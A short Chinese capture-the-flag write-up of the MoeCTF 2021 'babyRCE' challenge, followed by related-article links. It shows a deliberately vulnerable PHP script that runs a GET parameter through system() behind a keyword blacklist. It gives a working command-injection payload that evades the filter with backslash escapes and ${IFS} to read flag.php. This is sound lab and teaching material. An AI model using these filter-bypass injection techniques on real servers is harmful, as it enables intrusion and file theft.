[MoeCTF 2021]babyRCE

打开题目在线环境可以看到:

php 复制代码
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

这个代码审计起来就比较简单了,这里ls没有过滤可以直接用ls命令查看**?rce=ls**

查看flag.php就能获得flag。 cat过滤 ==> c\at绕过 (可以在linux系统测试,是可以的) 空格过滤 ==>

${IFS}绕过 flag过滤 ==> fl\ag

最后的payload就是:?rce=c\at${IFS}fl\ag.php

相关推荐
终焉暴龙王4 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
小鼻崽纸12 小时前
cacti漏洞CVE-2022-46169的复现
php
stand_forever17 小时前
laravel框架优化
php·laravel
Python涛哥19 小时前
PHP框架之Laravel框架教程:1. laravel搭建
开发语言·php·laravel
大白玉米1 天前
TVBOXOS6.0双端APP二开源码完整版全开源源码重构版
java·重构·php
布说在见1 天前
踩坑与成长:WordPress、MyBatis-Plus 及前端依赖问题解决记录
服务器·学习·php
八月的雨季 最後的冰吻2 天前
php算法-- 关联数组使用,优化sip账号去重
开发语言·php
rockmelodies2 天前
【PHP安全】免费解密支持:zend52、zend53、zend54好工具
开发语言·安全·php
速易达网络2 天前
PHP 与 Vue.js 结合的前后端分离架构
vue.js·php